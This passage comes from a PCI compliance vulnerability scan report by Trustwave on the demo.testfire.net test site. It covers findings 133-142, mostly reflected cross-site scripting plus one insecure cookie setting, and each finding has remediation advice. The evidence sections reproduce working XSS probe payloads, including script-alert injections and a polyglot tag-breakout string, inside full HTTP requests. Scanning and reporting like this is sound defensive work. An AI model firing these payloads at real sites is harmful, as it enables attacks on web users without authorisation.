JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650642.00617%29%2F%
2F%3E*%2Falert%2815650642.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

133 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117/util/serverStatusCheckService.jsp?HostNa


me=%3Cscript%3Ealert%2815650656.00947%29%3C%2Fscri
pt%3E
Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 431 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%3
Cscript%3Ealert%2815650656.00947%29%3C%2Fscript%3E -
HostName

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 432 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Detection: An alert was detected containing 15650656.00947

Request: GET
http://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%3
Cscript%3Ealert%2815650656.00947%29%3C%2Fscript%3E HTTP/1.1
Referer: http://65.61.137.117/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

134 Insecure configuration of 4.3 Medium Fail URL: http://demo.testfire.net:8080/


Cookie attributes Port: tcp/8080

A Cookie Vulnerability helps an attacker to gain access to session


information stored in cookies. It may also be used as a 'locator' attack
that precedes a Cross-Site Scripting (XSS) or Man-In-The-Middle attack.
When looking for Cookie Vulnerabilities, an attacker will first observe

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 433 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
cookies through various HTTP proxies and check their attributes. The
attacker will then try to steal cookies of various users by employing
multiple attacks. If successful, he/she may be able to get sensitive
information which can be further used in an illegitimate way.

CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http

Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29

Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = 03939398ea63ccaee93295dc28e42282
Path = /
Host = demo.testfire.net
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://demo.testfire.net:8080/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Secure flag must be set for Session Cookies for Application served over
SSL.
For all Session cookies, HTTPOnly flag would limit session access in
cases of Cross-Site Scripting issues. Proper Caching headers should be
set for responses carrying the cookie.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 434 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

135 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net:8080/search.jsp?query=%3Cscript%3E


alert%2815650659.00037%29%3C%2Fscript%3E
Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 435 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net:8080/search.jsp?query=%3Cscript%3Ealert%28
15650659.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650659.00037)</script>
Detection: An alert was detected containing 15650659.00037
Request: GET
http://demo.testfire.net:8080/search.jsp?query=%3Cscript%3Ealert%28
15650659.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 436 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

136 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net/index.jsp?content=javascript%3A%2F


%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextar
ea%3E%3C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%
29%2F%2F%3E*%2Falert%2815650660.00127%29%2F*
Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 437 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00127)//>*/alert(15650660.00127)/*
Detection: An alert was detected containing 15650660.00127
Request: GET
http://demo.testfire.net/index.jsp?content=javascript%3A%2F%2F%27
%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fs
cript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 438 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

137 Cross-Site Scripting 4.3 Medium Fail URL: https://demo.testfire.net:8443/search.jsp?query=%3Cscript%3


Ealert%2815650661.00037%29%3C%2Fscript%3E
Port: tcp/8443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 439 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net:8443/search.jsp?query=%3Cscript%3Ealert%2
815650661.00037%29%3C%2Fscript%3E - query
Injection: <script>alert(15650661.00037)</script>
Detection: An alert was detected containing 15650661.00037
Request: GET
https://demo.testfire.net:8443/search.jsp?query=%3Cscript%3Ealert%2
815650661.00037%29%3C%2Fscript%3E HTTP/1.1
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 440 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

138 Cross-Site Scripting 4.3 Medium Fail URL: https://65.61.137.117:8443/sendFeedback


Port: tcp/8443

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 441 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117:8443/sendFeedback - name
Injection: <script>alert(15650661.00557)</script>
Detection: An alert was detected containing 15650661.00557

Request: POST https://65.61.137.117:8443/sendFeedback HTTP/1.1


Origin: https://65.61.137.117:8443
Upgrade-Insecure-Requests: 1
Referer: https://65.61.137.117:8443/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=%3Cscript%3Ealert%2815650661.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 442 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

139 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net/sendFeedback


Port: tcp/80

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 443 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://demo.testfire.net/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00617)//>*/alert(15650660.00617)/*
Detection: An alert was detected containing 15650660.00617

Request: POST http://demo.testfire.net/sendFeedback HTTP/1.1


Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/feedback.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3
C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00617%29%2F%
2F%3E*%2Falert%2815650660.00617%29%2F*&subject=_WSETESTDA
TA&comments=_WSETESTAREADATA&submit=+Submit+

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 444 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

140 Cross-Site Scripting 4.3 Medium Fail URL: http://demo.testfire.net:8080/util/serverStatusCheckService.jsp


?HostName=%3Cscript%3Ealert%2815650659.00947%29%3C
%2Fscript%3E
Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 445 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://demo.testfire.net:8080/util/serverStatusCheckService.jsp?HostNa
me=%3Cscript%3Ealert%2815650659.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650659.00947)</script>
Detection: An alert was detected containing 15650659.00947
Request: GET
http://demo.testfire.net:8080/util/serverStatusCheckService.jsp?HostNa
me=%3Cscript%3Ealert%2815650659.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: http://demo.testfire.net:8080/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 446 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

141 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117:8080/index.jsp?content=javascript%3A%


2F%2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftex
tarea%3E%3C%2Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%
29%2F%2F%3E*%2Falert%2815650660.00127%29%2F*
Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 447 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
underlying web application may be vulnerable to being used in a cross-
site scripting (XSS) attack. While this vulnerability does not exploit the
web server itself, it can be utilized by an attacker to target end-users
and potentially take over their sessions or other sensitive information.

Cross-site scripting can be found in many different forms and


combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All Cross-Site Scripting vulnerabilities are considered non-compliant by


PCI.

CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http

Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting

Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
http://65.61.137.117:8080/index.jsp?content=javascript%3A%2F%2F%
27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2
Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* - content
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650660.00127)//>*/alert(15650660.00127)/*
Detection: An alert was detected containing 15650660.00127

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 448 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Request: GET
http://65.61.137.117:8080/index.jsp?content=javascript%3A%2F%2F%
27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2
Fscript%3E--
%3E%3Cp%22+%0A+onclick%3Dalert%2815650660.00127%29%2F%
2F%3E*%2Falert%2815650660.00127%29%2F* HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.

Please note that the listing of XSS vulnerabilities is not an exhaustive


list, and other XSS vulnerabilities may exist in the application.

142 Cross-Site Scripting 4.3 Medium Fail URL: http://65.61.137.117:8080/sendFeedback


Port: tcp/8080

A reflected cross-site scripting vulnerability was identified in this web


application. Reflected cross-site scripting is when HTML or Javascript
content is supplied to a user defined parameter to have it then
displayed (aka: reflected) back to the user and rendered or interpreted

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 449 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
by their browser.

This web site responded to a harmless web request that included


Javascript/HTML which was reflected back, indicating that the
underlying web application may be vulnerable to being used in a cross-
